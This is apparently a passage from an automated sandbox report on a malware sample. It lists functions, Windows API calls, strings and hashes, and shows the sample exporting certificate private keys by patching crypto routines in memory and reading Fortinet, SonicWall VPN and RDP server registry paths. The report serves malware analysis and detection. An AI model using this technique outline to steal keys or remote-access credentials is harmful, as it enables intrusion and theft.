628->628 629 7ff7327aa476-7ff7327aa487 call 7ff7327a97dc 628->629 629->384 632 7ff7327aa489-7ff7327aa4b7 call 7ff7327a1990 call 7ff7327a26b0 629->632 637 7ff7327aa4ba-7ff7327aa4c9 632->637 637->637 638 7ff7327aa4cb-7ff7327aa4dc call 7ff7327a97dc 637->638 638->384 641 7ff7327aa4de-7ff7327aa4e2 call 7ff7327a9478 638->641 641->384
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !sEs$&s(s$>;!&
                                                                                                        • API String ID: 0-4287716972
                                                                                                        • Opcode ID: 955dc88760089e02dcc542af92e6f6587c9a500c94dba93d8da6369fc093ed2c
                                                                                                        • Instruction ID: a6dcb46a197986af7581451b26c81586076afb7ffdc7d843a1af0c1133d936c5
                                                                                                        • Opcode Fuzzy Hash: 955dc88760089e02dcc542af92e6f6587c9a500c94dba93d8da6369fc093ed2c
                                                                                                        • Instruction Fuzzy Hash: DB52C491B053C2A9EB50EFB194052FDA7627B1A7D8F845035DF4A2BB8BDE7CA104D360
                                                                                                        Function 00007FF7327A2654 Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF7327A1951,?,?,00000000,00007FF7327A19BA), ref: 00007FF7327A2669
                                                                                                        • RtlReAllocateHeap.NTDLL(?,?,?,00007FF7327A1951,?,?,00000000,00007FF7327A19BA), ref: 00007FF7327A267A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1357844191-0
                                                                                                        • Opcode ID: 1be63deb12e22185627b2ef812326b1288c4791bb80671bf174c6fa45bf883bb
                                                                                                        • Instruction ID: 22ec9bee11965282d22c9040282cc51eaac0bf8953dcfdbc605c8a224791a0fc
                                                                                                        • Opcode Fuzzy Hash: 1be63deb12e22185627b2ef812326b1288c4791bb80671bf174c6fa45bf883bb
                                                                                                        • Instruction Fuzzy Hash: A6E08615A09586A1E948E796B9600759125BF5EFD1F888030EF0E07B55CD6CE851D610
                                                                                                        Function 00007FF7327A2D5C Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 253encryptiontimeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7327A2D90
                                                                                                        • CertGetNameStringW.CRYPT32 ref: 00007FF7327A2DD3
                                                                                                        • CertNameToStrW.CRYPT32 ref: 00007FF7327A2EB8
                                                                                                        • CertNameToStrW.CRYPT32 ref: 00007FF7327A2F0A
                                                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00007FF7327A2F4B
                                                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00007FF7327A2FC1
                                                                                                          • Part of subcall function 00007FF7327A1A70: wvsprintfW.USER32 ref: 00007FF7327A1AA9
                                                                                                          • Part of subcall function 00007FF7327A25B4: GetProcessHeap.KERNEL32 ref: 00007FF7327A25C1
                                                                                                          • Part of subcall function 00007FF7327A25B4: HeapFree.KERNEL32 ref: 00007FF7327A25CF
                                                                                                        • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7327A3178
                                                                                                          • Part of subcall function 00007FF7327A3220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A325E
                                                                                                          • Part of subcall function 00007FF7327A3220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7327A328D
                                                                                                          • Part of subcall function 00007FF7327A3220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A32BB
                                                                                                          • Part of subcall function 00007FF7327A3220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3336
                                                                                                          • Part of subcall function 00007FF7327A3220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3380
                                                                                                          • Part of subcall function 00007FF7327A3220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A33AC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
                                                                                                        • String ID: 1.2.840.113549
                                                                                                        • API String ID: 2787208766-3888290641
                                                                                                        • Opcode ID: 7c118aa1dc638b74cc484d50b524cc29b5b0ce845a120789e24d602a0ca92301
                                                                                                        • Instruction ID: 4e5e00fa623b52cc959a51ee97a579a790a6c27d4cef5ca2d5f1d2a2b8d3df26
                                                                                                        • Opcode Fuzzy Hash: 7c118aa1dc638b74cc484d50b524cc29b5b0ce845a120789e24d602a0ca92301
                                                                                                        • Instruction Fuzzy Hash: 09B1C662A0868295EB90EF52D4512BEE765FB8ABD4F800031EF8D07B59DFBCE104DB50
                                                                                                        Function 00007FF7327A900C Relevance: 13.6, APIs: 9, Instructions: 137pipeprocessCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateErrorLast$Pipe$CloseHandleProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2620922840-0
                                                                                                        • Opcode ID: 06c27cac1460b1730935b6838723191b56705425c7e0ff509bc79b6fafc0960c
                                                                                                        • Instruction ID: 948c51c7ffb6c4a5a0286e3a7baf6b19695674b87a4e07c0d8de3a91aa97d7fb
                                                                                                        • Opcode Fuzzy Hash: 06c27cac1460b1730935b6838723191b56705425c7e0ff509bc79b6fafc0960c
                                                                                                        • Instruction Fuzzy Hash: 8A517F32B08A42A9FB50EF61D4543ED63A1BB5EB98F800035EF0D97B59DEB8E109D750
                                                                                                        Function 00007FF7327A2BAC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65encryptionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cert$NameStore$CertificatesCloseEnumOpenString
                                                                                                        • String ID: +ss$+sls$fs{s${s{s
                                                                                                        • API String ID: 3617724111-3691527440
                                                                                                        • Opcode ID: 4a17e9d2c0338b9fb344b6cd7c9cf4f240aa7ae834c0939f847d1c0c3c5c31e0
                                                                                                        • Instruction ID: f81c53eb360ae3fa0bee0b54c6c6c2b6c6c3dc27e32d8f3db8ef9a210bb277ae
                                                                                                        • Opcode Fuzzy Hash: 4a17e9d2c0338b9fb344b6cd7c9cf4f240aa7ae834c0939f847d1c0c3c5c31e0
                                                                                                        • Instruction Fuzzy Hash: 6921B672A186C291E790EB16E4402AAE361FB8ABD0F849031EB8E47759DE7CE404DB50
                                                                                                        Function 00007FF7327A2B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34encryptionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CertEnumStoreSystem
                                                                                                        • String ID: ":{$"_":""
                                                                                                        • API String ID: 4132996702-2026347918
                                                                                                        • Opcode ID: 44da9b9bff8289d620a86c1f64e4909e3ecd95bd993dcceb9904786bee631e33
                                                                                                        • Instruction ID: ddffd0a9e684fa4f614f70ffa96e5cdc2f0596f2d31b9793b77debefaf39cf37
                                                                                                        • Opcode Fuzzy Hash: 44da9b9bff8289d620a86c1f64e4909e3ecd95bd993dcceb9904786bee631e33
                                                                                                        • Instruction Fuzzy Hash: B001A215E0869161FA44FB56A4000B99359BF9EFD0FC89031EE1E4776ACFACF142D350
                                                                                                        Function 00007FF7327A31C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22encryptionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CertEnumLocationStoreSystem
                                                                                                        • String ID: "_": ""
                                                                                                        • API String ID: 863500693-1453221996
                                                                                                        • Opcode ID: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
                                                                                                        • Instruction ID: 641b93e04bf40e8411010e8844afdf19ab46dcd1d330eef22825e4ae4e958590
                                                                                                        • Opcode Fuzzy Hash: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
                                                                                                        • Instruction Fuzzy Hash: 06E06D45B1854360EE84BBA2A8110F493197F5EBD0FC82032EA1F06366DDACF189D320
                                                                                                        Function 00007FF7327A968C Relevance: 3.0, APIs: 2, Instructions: 42filepipeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileNamedPeekPipeRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 327342812-0
                                                                                                        • Opcode ID: 34d1d673edd9c40d02f270326efd511933567532b5db1aeb081074a9eac190bf
                                                                                                        • Instruction ID: 4a5a8d0dc985addb9551c38d34729299b54496951686ead1c2f12fb8163521cd
                                                                                                        • Opcode Fuzzy Hash: 34d1d673edd9c40d02f270326efd511933567532b5db1aeb081074a9eac190bf
                                                                                                        • Instruction Fuzzy Hash: 3601C022B2868297E790AF16E44077AE3A0FB8ABE4F944134DB484B754DFBCE450DB50
                                                                                                        Function 00007FF7327A95A0 Relevance: 3.0, APIs: 2, Instructions: 39synchronizationCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2021502500-0
                                                                                                        • Opcode ID: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
                                                                                                        • Instruction ID: 392a9303c67ec34944768053ede1ea8c1acf80f3eab31d8ef9269c38c7c374ca
                                                                                                        • Opcode Fuzzy Hash: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
                                                                                                        • Instruction Fuzzy Hash: 5A019622A08582E1FF90AF25D4403B9A351FF49F98FA45031CB0D47689DFACECA5D310
                                                                                                        Function 00007FF7327A1A70 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 695 7ff7327a1a70-7ff7327a1ab8 call 7ff7327a1918 wvsprintfW
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wvsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2795597889-0
                                                                                                        • Opcode ID: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                                                        • Instruction ID: 4f6c761abce4cfa601eb29ba47f354a5345aa3ac04c783caf97548fc564d6efd
                                                                                                        • Opcode Fuzzy Hash: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                                                        • Instruction Fuzzy Hash: ECE039B2A00B45D2D7049B15E94008DBB75FB99FD4B958021CB4817324CF38D996C760
                                                                                                        Function 00007FF7327A79C4 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 698 7ff7327a79c4-7ff7327a79d9 GetNativeSystemInfo 699 7ff7327a79e7 698->699 700 7ff7327a79db-7ff7327a79e1 698->700 702 7ff7327a79e9-7ff7327a79ed 699->702 700->699 701 7ff7327a79e3-7ff7327a79e5 700->701 701->702
                                                                                                        APIs
                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF7327A74DE), ref: 00007FF7327A79CD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoNativeSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1721193555-0
                                                                                                        • Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                                        • Instruction ID: a98458d5b10bfe7fa9221026d72eeafcd6ab1c3c3c5edc66fa4c892b2788916c
                                                                                                        • Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                                        • Instruction Fuzzy Hash: 6DD09B11D0C581E2DA717B0094060BA9361B75D715FD00232D38D015546FBDA585E915

                                                                                                        Non-executed Functions

                                                                                                        Function 00007FF7327ADC0C Relevance: 54.7, APIs: 16, Strings: 15, Instructions: 436filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
                                                                                                        • String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
                                                                                                        • API String ID: 2508640211-1951492331
                                                                                                        • Opcode ID: a93e81c449e043e84e899d30c25acc9401cbbda14605dd7e525ccf0dd7e6f58a
                                                                                                        • Instruction ID: 7cd1dffaa4c524ca22626d5bfea9485a64081cd6c41d311270ffdd1b2a29cc86
                                                                                                        • Opcode Fuzzy Hash: a93e81c449e043e84e899d30c25acc9401cbbda14605dd7e525ccf0dd7e6f58a
                                                                                                        • Instruction Fuzzy Hash: 1B12B262A1858265EA90FB65D4502F9A361BF9BBD4FC04031EB0E07B9ADFBCF504D720
                                                                                                        Function 00007FF7327A3220 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 313encryptionmemorylibraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A325E
                                                                                                        • CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7327A328D
                                                                                                        • CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A32BB
                                                                                                          • Part of subcall function 00007FF7327A36F0: CryptExportKey.ADVAPI32 ref: 00007FF7327A3744
                                                                                                          • Part of subcall function 00007FF7327A36F0: CryptExportKey.ADVAPI32 ref: 00007FF7327A379E
                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3336
                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3380
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A33AC
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A33DC
                                                                                                        • CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A3404
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A341C
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A343F
                                                                                                        • CryptAcquireContextA.ADVAPI32 ref: 00007FF7327A3459
                                                                                                        • CryptImportKey.ADVAPI32 ref: 00007FF7327A347E
                                                                                                        • OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A34B5
                                                                                                        • OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3505
                                                                                                        • QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3523
                                                                                                        • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3532
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A355D
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A357C
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A359F
                                                                                                        • NCryptExportKey.NCRYPT ref: 00007FF7327A3605
                                                                                                        • CertOpenStore.CRYPT32 ref: 00007FF7327A3667
                                                                                                        • CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF7327A3682
                                                                                                        • CertSetCertificateContextProperty.CRYPT32 ref: 00007FF7327A369E
                                                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF7327A36BD
                                                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF7327A36DF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
                                                                                                        • String ID: -,0z$5)F$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$km{l
                                                                                                        • API String ID: 2161712720-385819238
                                                                                                        • Opcode ID: 80743156e14c4dc42c3126eeaf53f5bec289248513e28e2008ad3dbb05276c09
                                                                                                        • Instruction ID: 82c6ac0953baefb314ebe51612a4a6c737a34aaff247e8e2b49487d8e91298df
                                                                                                        • Opcode Fuzzy Hash: 80743156e14c4dc42c3126eeaf53f5bec289248513e28e2008ad3dbb05276c09
                                                                                                        • Instruction Fuzzy Hash: AEE14832B18A819AE750DFA1E444AEDB3A1BB49B88F804136DF4E17B58DF7CE109D750
                                                                                                        Function 00007FF7327A213C Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 241COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
